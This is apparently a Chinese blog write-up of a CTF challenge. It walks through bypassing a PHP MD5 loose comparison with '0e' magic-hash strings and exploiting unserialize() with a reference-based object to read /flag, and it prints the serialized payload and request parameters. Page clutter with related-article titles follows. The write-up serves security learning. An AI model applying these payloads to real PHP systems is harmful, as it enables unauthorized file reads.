目录

  • 源码
  • 思路
  • 题解
  • 总结

源码

<?php
/*** Created by PhpStorm.* User: jinzhao* Date: 2019/10/6* Time: 8:04 PM*/highlight_file(__FILE__);class BUU {public $correct = "";public $input = "";public function __destruct() {try {$this->correct = base64_encode(uniqid());if($this->correct === $this->input) {echo file_get_contents("/flag");}} catch (Exception $e) {}}
}if($_GET['pleaseget'] === '1') {if($_POST['pleasepost'] === '2') {if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {unserialize($_POST['obj']);}}
}

思路

这题只要让$correct$input相等就能解出flag了,主要但是$correct用到了uniqid()方法

可以用&来引用,类似于c语言中的指针,使$input指向$correct的地址,让他们永远相等

题解

先在本地进行序列化输出

<?phpclass BUU {public $correct ;public $input ;// public function __destruct() {//     try {//         $this->correct = base64_encode(uniqid());//         if($this->correct === $this->input) {//             echo file_get_contents("/flag");//         }//     } catch (Exception $e) {//     }// }
}$a = new BUU;
$a ->input = &$a->correct;//O%3A3%3A%22BUU%22%3A2%3A%7Bs%3A7%3A%22correct%22%3BN%3Bs%3A5%3A%22input%22%3BR%3A2%3B%7D
echo(urlencode(serialize($a)));

md5

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

payload

GET:?pleaseget=1
POST:pleasepost=2&md51=s878926199a&md52=s155964671a&obj=O%3A3%3A%22BUU%22%3A2%3A%7Bs%3A7%3A%22correct%22%3BN%3Bs%3A5%3A%22input%22%3BR%3A2%3B%7D

总结

太久没更新了

BUU CODE REVIEW 1相关推荐

  1. 如何在团队中做好Code Review

    一.Code Review的好处 想要做好Code Review,必须让参与的工程师充分认识到Code Review的好处 1.互相学习,彼此成就 无论是高手云集的架构师团队,还是以CURD为主的业务 ...

  2. Google是如何做Code Review的?| CSDN原力计划

    作者 | 帅昕 xindoo 编辑 | 屠敏 出品 | CSDN 博客 我和几个小伙伴一起翻译了Google前一段时间放出来的Google's Engineering Practices docume ...

  3. 刚进美团,就被各种Code Review,真的有必要吗?

    点击关注公众号,Java干货及时送达 众所周知,Code Review是开发过程中一个非常重要的环节,但是很多公司或者团队是没有这一环节的,今天笔者结合自己所在团队,浅谈Code Review的价值及 ...

  4. 刚入职,就被各种 Code Review,真的有必要吗?

    点击上方蓝色"方志朋",选择"设为星标" 回复"666"获取独家整理的学习资料! 来源:juejin.cn/post/ 6882333635 ...

  5. 有必要做 Code Review 吗???

    点击上方蓝色"方志朋",选择"设为星标" 回复"666"获取独家整理的学习资料!作者:梨香 链接:https://juejin.im/pos ...

  6. 你太菜了,竟然不知道Code Review...

    点击上方"方志朋",选择"设为星标" 回复"666"获取新整理的面试资料 作者:宝玉   来源:http://1t.click/aA4h 我 ...

  7. 从零开始 Code Review,两年实战经验分享!

    点击上方"方志朋",选择"置顶公众号" 技术文章第一时间送达! 来源:http://t.cn/RtHE14S 前几天看了<Code Review 程序员的 ...

  8. 作为CTO,我为什么必须要求代码进行Code Review!

    来源:宝玉 链接:https://cnblogs.com/dotey/p/11216430.html 我一直认为Code Review(代码审查)是软件开发中的最佳实践之一,可以有效提高整体代码质量, ...

  9. 万字详文告诉你如何做 Code Review

    点击上方"小白学视觉",选择加"星标"或"置顶" 重磅干货,第一时间送达本文转自|机器学习实验室 前言 作为公司代码委员会 golang 分 ...

最新文章

  1. 学python工资高吗-现在Python就业薪资高吗?
  2. 设置apache目录认证
  3. 自2018年以来我不知道的事情-Dan Abramov
  4. [js高手之路]深入浅出webpack教程系列9-打包图片(file-loader)用法
  5. @EnableDiscoveryClient
  6. 公司软件AiDitron中涉及的英文单词及含义
  7. C语言结构体用法很多,坑也很多
  8. 苹果Apple Watch样机Mockups素材,你用过吗?
  9. 理解UIApplication
  10. Python数据类型(3)
  11. 数据分析面试:业务题
  12. matlab多元正态性检验,Matlab正态分布性检验
  13. android跳转QQ陌生人聊天或者加入QQ群
  14. CSS入门(狂神学习笔记)
  15. 飞控中的IIR二阶滤波器
  16. 【报告分享】2020中国老酒白皮书-胡润研究院(附下载)
  17. 数字孪生使用云流化的优势
  18. 跟我学Kafka:Kafka消费组运维详解
  19. STM32F207ZG GPIO口学习
  20. 05- 线性回归算法 (LinearRegression) (算法)

热门文章

  1. Erlang的边界检查(3)
  2. asp.net中的记忆盲区
  3. Facebook API使用经验分享
  4. SQL Server 2008新特性——SSMS增强
  5. 听易中天品三国---看孔融,杨修之死
  6. sysfs方式控制GPIO
  7. hyperledge工具-configtxgen
  8. python小工具myqr生成动态二维码
  9. 工具的学习使用(二):快捷键、工具、批处理
  10. JAVA BIO 服务器与客户端实现示例